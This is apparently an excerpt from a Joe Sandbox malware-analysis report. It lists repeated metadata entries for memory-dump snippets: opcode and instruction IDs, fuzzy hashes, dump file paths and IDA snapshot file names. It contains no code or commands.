                  • Instruction ID: d64670dc213874732924196431e3e960e9212885417fa49cbfefc6dbefd963a8
                  • Opcode Fuzzy Hash: 5d16e69b504af59299e35ff973c02e3142915f7342ba62c69bd2088626239b7d
                  • Instruction Fuzzy Hash: AB01D870A0E74D4FE791A7B488695A97FE0EF05304F0614F6D449C70B6DA78E5648301
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5af76fb6e4efb56a3b6a2c6cac2687efb4b1867601e953cd3dfa389270787b02
                  • Instruction ID: 3331c8f96274e0d767b4cfed7a2c810856efd72b5eb1b26225ef58f3d827ac1b
                  • Opcode Fuzzy Hash: 5af76fb6e4efb56a3b6a2c6cac2687efb4b1867601e953cd3dfa389270787b02
                  • Instruction Fuzzy Hash: 78016230A1960E8AEB98EBA4C4685B973A0FF58309F11147EE41EC21E5DF75E650C700
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction ID: 86d2f720ce8802973218eb826a5b267d76927daa8107ee14fb2c9720d7f9ba6d
                  • Opcode Fuzzy Hash: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction Fuzzy Hash: 68016230A1560E8BEB99EFA4C4696BD73A1FF18309F11187ED41EC21E5DE75E250C600
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53bcaa8ea9cadcc310871c092a10b11dc1adf1bba0e10b731fae19b785843bdf
                  • Instruction ID: f7b9e60fb7a0976c3513e5d2a6967ce65b252698a110f78a14bae57ba78423a9
                  • Opcode Fuzzy Hash: 53bcaa8ea9cadcc310871c092a10b11dc1adf1bba0e10b731fae19b785843bdf
                  • Instruction Fuzzy Hash: D0011D30F0550E8BEB60EB58C890AEEB3B1EB54311F1181B6D419E7294DE75AE44CF84
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction ID: ef536e20907435eade4cb9562d6ca5f1ce3e862e9208ce0a7bcf21cf37bdcff0
                  • Opcode Fuzzy Hash: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction Fuzzy Hash: 3EF0AF3090E38D8FEBAA9F7488252A93B60EF56204F4614FAD449C60E2DA68D548C701
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8e313ea1895f7710021beb8c4925d2a28fd76f9f8db9d31f15c490b50e79e6a
                  • Instruction ID: 3873bfbb85dfe13b03d3a023f761aaa94ea0d6cc3018e504db8574d14ebda609
                  • Opcode Fuzzy Hash: b8e313ea1895f7710021beb8c4925d2a28fd76f9f8db9d31f15c490b50e79e6a
                  • Instruction Fuzzy Hash: 50017170E0961E8FDB64DF90C490AFEB3B1EF54300F505676C409A2295DF78AA85DB80